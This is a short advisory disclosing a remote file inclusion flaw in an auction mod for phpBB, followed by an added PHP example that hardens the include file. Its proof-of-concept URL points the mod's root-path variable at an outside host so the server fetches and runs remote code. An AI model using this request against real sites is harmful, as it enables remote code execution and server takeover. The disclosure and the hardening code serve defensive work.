phpBB auction mod - Remote File Inclusion Vuln
===================================
developer's site: http://www.phpbb-auction.com
script: Auction mod for phpBB
risk: critical
status: unpatched
discovered by: VietMafia
===================================
Vuln. Description:
This flaw is due to an input validation error in "aution\auction_common.php" (line 26),
which does not validate the "$phpbb_root_path" variable properly. Remote attackers can include
malicious scripts and execute arbitrary commands with the privileges of the web server.
PoC:
http://[target]/[path]/aution\auction_common.php?
phpbb_root_path=http://unsecured-systems.com/forum/
===================================
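Added example, not code from the mod or from the advisory author: a hardened header for an include-only file of the kind described above, with the vulnerable pattern shown in a comment for contrast. The included file name "auction/functions.php" and the directory layout are assumptions made for illustration.

```php
<?php
// Constructed illustration; the mod's real source is not shown in the advisory.
//
// Vulnerable pattern (hypothetical reconstruction, file name assumed):
//     include($phpbb_root_path . 'auction/functions.php');
// With register_globals on, a request parameter of the same name sets
// $phpbb_root_path before that line runs, so the include target is
// chosen by the requester.

// 1. Refuse direct HTTP requests. phpBB entry scripts define IN_PHPBB before
//    including other files; a directly requested include file never sees it.
if (!defined('IN_PHPBB')) {
    die('Hacking attempt');
}

// 2. Derive the root from this file's own location instead of trusting a
//    variable that request input may have populated.
//    Assumption: this file sits one directory below the phpBB root.
$phpbb_root_path = dirname(__DIR__) . DIRECTORY_SEPARATOR;

// 3. Resolve each include target and require it to be an existing local
//    file underneath the root before handing it to include.
function auction_local_include_path(string $root, string $relative): string
{
    $base = realpath($root);
    $full = realpath($root . $relative); // false for URLs and missing files
    if ($base === false || $full === false
        || strpos($full, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('Refusing include outside phpBB root');
    }
    return $full;
}

// Hypothetical file name, used only to show the call.
include auction_local_include_path($phpbb_root_path, 'auction/functions.php');
```

Requested directly, this file stops at step 1. In php.ini, `register_globals = Off` and `allow_url_include = Off` block the remote-URL case independently of the code change.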
have a good time all my friends
===================================